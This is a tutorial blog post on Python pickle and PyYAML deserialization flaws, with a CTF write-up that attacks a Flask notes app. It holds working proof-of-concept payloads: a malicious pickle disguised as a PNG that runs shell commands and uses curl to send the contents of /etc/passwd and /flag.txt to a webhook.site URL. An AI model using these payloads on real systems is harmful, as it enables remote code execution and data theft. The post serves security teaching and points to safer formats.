Python Serialization Vulnerabilities - Pickle

Serialization takes the data held in objects and converts it to a stream of bytes, which can then be written to disk or sent over a network. The data can later be deserialized to recreate the original objects. Many programming languages offer a way to do this, including PHP, Java, Ruby and Python (all common backend languages on the web).

Let's talk about serialization in Python. When we use the pickle module, serialization is called pickling.

E.g., here is a list, pickled:

>>> import pickle
>>> foo = pickle.dumps([1,2,3])
>>> print(foo)
b'\x80\x04\x95\x0b\x00\x00\x00\x00\x00\x00\x00]\x94(K\x01K\x02K\x03e.'
>>> pickle.loads(foo)
[1, 2, 3]
>>>

As we can see above, printing the variable foo shows a byte string. This is the serialized form. Later, pickle.loads(foo) deserializes it back into the original list.

This is helpful in many cases, for instance when I want to save a variable from a program to disk as a binary file that other programs can use later. Eg:

As we can see, a pickle binary is now stored on the drive. Let's read it using pickle again.

As you can see, we can now operate on this deserialized object (new_object) just like a list again!
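The save-and-load round trip described above can be sketched as follows. The file name saved_list.pkl and the use of the temporary directory are illustrative assumptions; only the name new_object comes from the text.

```python
import os
import pickle
import tempfile

original = [1, 2, 3]

# Hypothetical location for the pickle file
path = os.path.join(tempfile.gettempdir(), "saved_list.pkl")

# Serialize the list straight into a binary file
with open(path, "wb") as fh:
    pickle.dump(original, fh)

# Later (possibly in another program): read it back
with open(path, "rb") as fh:
    new_object = pickle.load(fh)

# The result is an ordinary list again
new_object.append(4)
print(new_object)
```

Note that pickle.dump() and pickle.load() work on file objects, while pickle.dumps() and pickle.loads() work on bytes in memory.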

Throughout the SDLC, there may come a time when a developer wants to quit the IDE but keep the data and state of all variables at that moment. That is where this feature helps.

Serialization in Web Apps

Okay, so we have talked about serialization in software applications. But what is the use of serialization in web apps? HTTP is a stateless protocol: each request is handled independently of the previous one. But sometimes state needs to be maintained. That's why we have cookies. Cookies bring a sense of statefulness to HTTP.

If we want a user's information and some data to be retained the next time they interact with the server, serialization is a wonderful use case. Just serialize some data, put it into a cookie (which, btw, takes up the user's storage and not the server's! WoW) and on the next request just deserialize it and use it on the site.

Pickle is sometimes used in Python web apps to do this. But one caveat is that unpickling is unsafe, and a cookie's content is controlled by the client. Just FYI, serialization in JSON is much safer! Unlike pickle, JSON describes only data (strings, numbers, booleans, null, arrays and objects) and has no way to embed executable code. This removes the code-injection risk that malicious actors exploit in pickle data.
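A minimal sketch of the safer cookie idea, assuming JSON for the data and an HMAC signature so the server can detect client-side tampering. The names SECRET_KEY, encode_cookie and decode_cookie are hypothetical and not part of any framework; real apps would normally rely on their framework's signed-session support.

```python
import base64
import hashlib
import hmac
import json

# Hypothetical server-side secret; never sent to the client
SECRET_KEY = b"change-me"


def encode_cookie(data: dict) -> str:
    """Serialize data as JSON, base64-encode it and append an HMAC signature."""
    payload = base64.urlsafe_b64encode(json.dumps(data).encode("utf-8"))
    signature = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest()
    return payload.decode("ascii") + "." + signature


def decode_cookie(cookie: str) -> dict:
    """Verify the signature first, then parse the JSON payload."""
    payload, _, signature = cookie.rpartition(".")
    expected = hmac.new(SECRET_KEY, payload.encode("ascii"), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(signature, expected):
        raise ValueError("cookie signature mismatch")
    return json.loads(base64.urlsafe_b64decode(payload))


cookie = encode_cookie({"user": "alice", "theme": "dark"})
print(decode_cookie(cookie))
```

Even if the signature check were skipped, json.loads() could only ever produce plain data, never a function call.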

It is possible to construct malicious pickle data which will execute arbitrary code!

Over Pickling

We have talked about pickling well-known data types like a list. But what if I were to pickle my own custom classes? Python can easily understand and deserialize built-in types, but what will it do with custom classes, like connections to servers and all those fancy networking scripts? It doesn't even make sense to serialize those, but the Python developers added a way to pickle them too. Discrepancies can occur when Python tries to deserialize such objects.

Custom pickling and unpickling code can be used. When you define a class, you can provide a mechanism that states, 'here is what you should do when someone asks to unpickle you!' So when Python goes to unpickle this string of bytes, it might have to run some code to figure out how to properly reconstruct that object. The instructions for this (which callable to run and with which arguments) are embedded in the pickle file.
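Before the real proof of concept, here is a harmless sketch of the mechanism. The class name Harmless is made up for illustration, and the built-in sorted() stands in for whatever callable a pickle might name.

```python
import pickle


class Harmless:
    # __reduce__ tells pickle: "to rebuild me, call this callable with these arguments"
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))


payload = pickle.dumps(Harmless())

# Unpickling calls sorted([3, 1, 2]) and returns its result
result = pickle.loads(payload)
print(result)
print(type(result))
```

The unpickled value is a sorted list, not a Harmless instance: the unpickler simply called the function named in the data. Swap sorted for a more dangerous callable and the same mechanism runs attacker-chosen code.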

Let's see a small example

Here is the code for a proof of concept. It creates a class called EvilPickle. To implement support for pickling on your custom object, you define a method called "__reduce__" which returns a callable and a tuple of arguments to call it with. Here, a simple "cat /etc/passwd" is run through the os.system function. Finally, the pickle is written to a binary file called backup.data.

import pickle
import os
class EvilPickle(object):
  def __reduce__(self):
    return (os.system, ('cat /etc/passwd', ))
pickle_data = pickle.dumps(EvilPickle())
with open("backup.data", "wb") as file:
  file.write(pickle_data)

The idea here is to make the deserializer run cat /etc/passwd on their system.

Let's try it out now!

We save the above code in evilpickle.py file and run it. Just to check, we'll cat the backup.data file. Here we can clearly see something fishy!

The user deserializes it anyway and ends up giving out /etc/passwd file.

import pickle
# Unpickling the file runs the embedded os.system call
with open("backup.data", "rb") as file:
  pickle.loads(file.read())

We can get even more nerdy and see what is happening under the hood by disassembling the file with pickletools. Here, the pickling was done on a Unix-like OS, so os.system shows up under its real module name, posix. With pickle protocol 4 or later, the strings posix and system are each pushed with a SHORT_BINUNICODE opcode, and every MEMOIZE that follows stores the value on top of the stack in the memo under the next index (0, 1, 2 and so on). STACK_GLOBAL then resolves those two strings to the callable posix.system. The argument cat /etc/passwd is pushed and wrapped into a one-element tuple (the TUPLE1 opcode), and the REDUCE opcode calls the callable with that tuple as its arguments. Finally, STOP ends the program.

The arguments are a tuple rather than a list. The primary difference is that tuples are immutable while lists are mutable, so the contents of a tuple cannot change once it has been created.

python3 -m pickletools -a backup.data

note: the -a option annotates each step with a short description of the opcode
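The same inspection can be done from Python without ever loading the pickle. The sketch below uses pickletools.genops() to list opcodes that import or call something; the SUSPICIOUS set and the helper name suspicious_opcodes are assumptions for illustration, and a scan like this is a triage aid, not a security boundary.

```python
import pickle
import pickletools

# Opcodes that import globals or call/construct objects (illustrative selection)
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
              "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def suspicious_opcodes(data: bytes) -> list:
    """Walk the opcode stream without executing it and collect risky opcodes."""
    return [op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in SUSPICIOUS]


class CallsSorted:
    # Harmless stand-in for a payload: unpickling would call sorted([3, 1, 2])
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))


print(suspicious_opcodes(pickle.dumps([1, 2, 3])))
print(suspicious_opcodes(pickle.dumps(CallsSorted())))
```

A plain list of integers yields no flagged opcodes, while the second pickle includes REDUCE. Pickles of ordinary class instances also use some of these opcodes, so a hit means "look closer", not "malicious".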

So since the pickle data is user-controlled and is unpickled on the server, we can even use this to get a remote shell on the server (by pickling a payload that opens a socket back to us and providing it to the server).

Until recently, PyTorch serialized ML models with pickle, which made loading an untrusted model file vulnerable to arbitrary code execution (https://github.com/pytorch/pytorch/issues/52596). The Safetensors format avoids this issue.

Is Python YAML better?

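PyYAML is another serialization option instead of pickle. But even PyYAML can execute arbitrary code: older versions did so with a plain yaml.load(), while current versions require a Loader argument and do so when given an unsafe loader. Here is another POC:

import yaml
document = "!!python/object/apply:os.system ['cat /etc/passwd']"
# PyYAML 6 requires an explicit Loader; UnsafeLoader permits python/object/apply tags
yaml.load(document, Loader=yaml.UnsafeLoader)

This would also execute cat /etc/passwd. We can avoid this by using "safe_load()" instead of load ;)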

WHAT IS SAFE THEN?

Alternatives to pickle are:

  1. JSON

import json

# Serialize
data = {"key": "value"}
json_data = json.dumps(data)

# Deserialize
deserialized_data = json.loads(json_data)

  2. msgpack

import msgpack

# Serialize
data = {"key": "value"}
msgpack_data = msgpack.packb(data)

# Deserialize
deserialized_data = msgpack.unpackb(msgpack_data, raw=False)

Others: protobuf by google, CBOR
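If pickle cannot be avoided, the Python documentation describes restricting which globals an unpickler may resolve by overriding Unpickler.find_class(). A minimal sketch along those lines follows; the allow-list SAFE_BUILTINS and the names RestrictedUnpickler and restricted_loads are illustrative choices, and this reduces the attack surface rather than making untrusted pickles safe.

```python
import builtins
import io
import os
import pickle

# Illustrative allow-list: only these built-in names may be resolved
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle asks for a global such as posix.system
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads(), but refuses any global outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class EvilPickle:
    def __reduce__(self):
        return (os.system, ("echo pwned",))


print(restricted_loads(pickle.dumps([1, 2, range(3)])))

try:
    restricted_loads(pickle.dumps(EvilPickle()))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

The lookup of os.system is rejected before REDUCE can call it, so the echo command never runs.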

Small CTF on Pickling

Okay. So the given website is a note taking website which is using serialization. Here is what happens when I submit a note with a PNG image.

This looks something like this when processed by the server. Observe the URL which is rendering a .pickle file

The challenge also provided us with an app.py source code which tells us all about the background logic.

#!/usr/bin/env python3

from flask import Flask, render_template, send_from_directory, request, redirect
from werkzeug import secure_filename

import pickle
import os

NOTE_FOLDER='notes/'


class Note(object):
    def __init__(self, title, content, image_filename):
        self.title=title
        self.content=content
        self.image_filename=secure_filename(image_filename)
        self.internal_title=secure_filename(title)


def save_note(note, image):
    note_file=open(NOTE_FOLDER + secure_filename(note.title + '.pickle'), 'wb')
    note_file.write(pickle.dumps(note))
    note_file.close()

    image.save(NOTE_FOLDER + note.image_filename)


def unpickle_file(file_name):
    note_file=open(NOTE_FOLDER + file_name, 'rb')
    return pickle.loads(note_file.read())


def load_all_notes():
    notes=[]
    for filename in os.listdir(NOTE_FOLDER):
        if filename.endswith('.pickle'):
            notes.append(unpickle_file(filename))
    return notes


app=Flask(__name__)


@app.route('/')
def index():
    return render_template('index.html', notes=load_all_notes())


@app.route('/notes/<file_name>')
def notes(file_name):
    if request.args.get('view', default=False):
        note=unpickle_file(file_name)
        return render_template('view.html', note=note)
    else:
        return send_from_directory(NOTE_FOLDER, file_name)


@app.route('/new', methods=['GET', 'POST'])
def note_new():
    if request.method == "POST":
        image=request.files.get('image')
        if not image.filename.endswith('.png'):
            return 'nah bro png images only!', 403
        new_note=Note(
            request.form.get('title'),
            request.form.get('content'),
            image_filename=image.filename
        )
        save_note(new_note, image)
        return redirect('/notes/' + new_note.internal_title + '.pickle' + '?view=true')
    return render_template('new.html')


if __name__ == "__main__":
    app.run(
        host='0.0.0.0',
        port=5000
    )

As we can see, the code is accepting title, content and image as an object, pickling it and storing it in title.pickle

Here are the key functions of the code:

  1. The Note class takes 3 values (title, content, image_filename) and stores them on the object, along with internal_title, a sanitized copy of the title. new_note is an instance of it.

  2. save_note() calls pickle.dumps() to pickle new_note and writes the result to a .pickle file named after the title. It also stores the image using image.save(), a method of the uploaded file object that Flask hands us (a Werkzeug FileStorage). Similarly, image.filename gives the uploaded file's name.

  3. secure_filename() function converts insecure names to secure ones. For example: note 1 becomes note_1, ../../../etc/passwd becomes etc_passwd

  4. unpickle_file() opens the file name it is given inside the notes folder and unpickles its contents.

Here are some key takeaways about the functionality of the code:

  1. Site is accepting 3 key items.

  2. It is not checking whether the PNG is safe (as in, whether it is a valid PNG at all). This is a good attack point.

  3. We can send pickled code in a file named .png and access it by its file name, since the notes() function unpickles whatever file name it is given when the view parameter is set. We just have to remember the file name of the PNG we provide. See below: we just need to request /notes/filename.png?view=true and the site will unpickle it!

    @app.route('/notes/<file_name>')
    def notes(file_name):
        if request.args.get('view', default=False):
            note=unpickle_file(file_name)

  4. All in all, the PNG file upload is a really strong place to put code because: a, the site isn't validating that the PNG is really a PNG and b, it will unpickle any file we provide
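The two gaps listed above can be illustrated with a small sketch of the checks the app is missing. The helper names looks_like_png and may_unpickle are hypothetical and not part of the challenge code; the 8-byte PNG signature is standard. These checks alone would not make unpickling safe, they only show why the upload is such an easy target.

```python
import pickle

# Every valid PNG file starts with this 8-byte signature
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def looks_like_png(data: bytes) -> bool:
    """Cheap content check: does the upload at least start like a PNG?"""
    return data.startswith(PNG_SIGNATURE)


def may_unpickle(file_name: str) -> bool:
    """Only files the server pickled itself should ever reach pickle.loads()."""
    return file_name.endswith(".pickle")


# A pickle renamed to evil.png fails both checks
fake_png = pickle.dumps(["not", "an", "image"])
print(looks_like_png(fake_png))
print(may_unpickle("evil.png"))
```

In the challenge app neither check exists, so a pickle with a .png name is stored as-is and later unpickled on request.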

So, it was settled. I'd pickle a simple shell command and put it in a .png file, then access it with the view GET parameter so the site unpickles it.

I tried with a simple whoami command on my local machine and the evil.png pickled file was deserializing properly!

Let's take it a step further and use webhook.site to receive data when evil.png is deserialized locally and runs whoami. I used a simple curl command that sends the output as a GET parameter, since the site doesn't display the command's output itself. But because it does deserialize the file, the command runs and I can receive the data elsewhere (e.g. an endpoint I control on webhook.site).

i=$(whoami); curl "https://webhook.site/?whoami=$i"

Once I submit the new evil.png and access it, I see a new connection on webhook.

As we can see, the deserialization has worked, command executed and we receive whoami's answer! Let's try this on the website.

site.com/notes/evil.png?view=true

On webhook I see this

On webhook, I receive a new connection and answer! This proves we have arbitrary code execution on the server! What's more, it is running as root already as you can see below. No privilege escalation required, we can read any sensitive files through this.

Let's craft a command which reads /flag.txt off the server.

i=$(cat /flag.txt); curl "https://webhook.site/5ff7d8e6-7b4c-499b-9663-90380e051c03?id=$i"

Now, curl is tricky: it will throw a "curl: (3) URL using bad/illegal format or missing URL" error if it encounters characters that are illegal in a URL, such as []{}(). So I had to be crafty and URL-encode the value with a python command inside a second subshell (the $() in the bash command).

i=$(cat /flag.txt); i=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$i'))"); curl "https://webhook.site/5ff7d8e6-7b4c-499b-9663-90380e051c03?id=$i"
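To see what the urllib.parse.quote() step does to such a value, here is a short sketch. The flag string is a made-up example, not the real flag.

```python
from urllib.parse import quote

# Hypothetical flag containing characters that are not legal in a URL
flag = "flag{a b}"

# quote() percent-encodes everything except letters, digits and a few safe characters
encoded = quote(flag)
print(encoded)  # flag%7Ba%20b%7D
```

The braces and the space become %7B, %7D and %20, so curl receives a well-formed URL.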

Final python code looked like this.

import pickle
import os
class EvilPickle(object):
  def __reduce__(self):
    return (os.system, ('i=$(cat /flag.txt); i=$(python3 -c "import urllib.parse; print(urllib.parse.quote(\'$i\'))"); curl "https://webhook.site/5ff7d8e6-7b4c-499b-9663-90380e051c03?id=$i"', ))
pickle_data = pickle.dumps(EvilPickle())
with open("evil.png", "wb") as file:
  file.write(pickle_data)

When I executed this locally, I could see the contents of /flag.txt I crafted in local system!

Then I uploaded this file on the server

Then I accessed the PNG file

Finally, when I looked at the webhook, I saw a new connection containing the data I wanted: the contents of the server's flag.txt file!

This is how an attacker would exploit unsafe deserialization with Python's pickle module.

I blurred out the PIIs and CTF site details so that no cheating is possible.
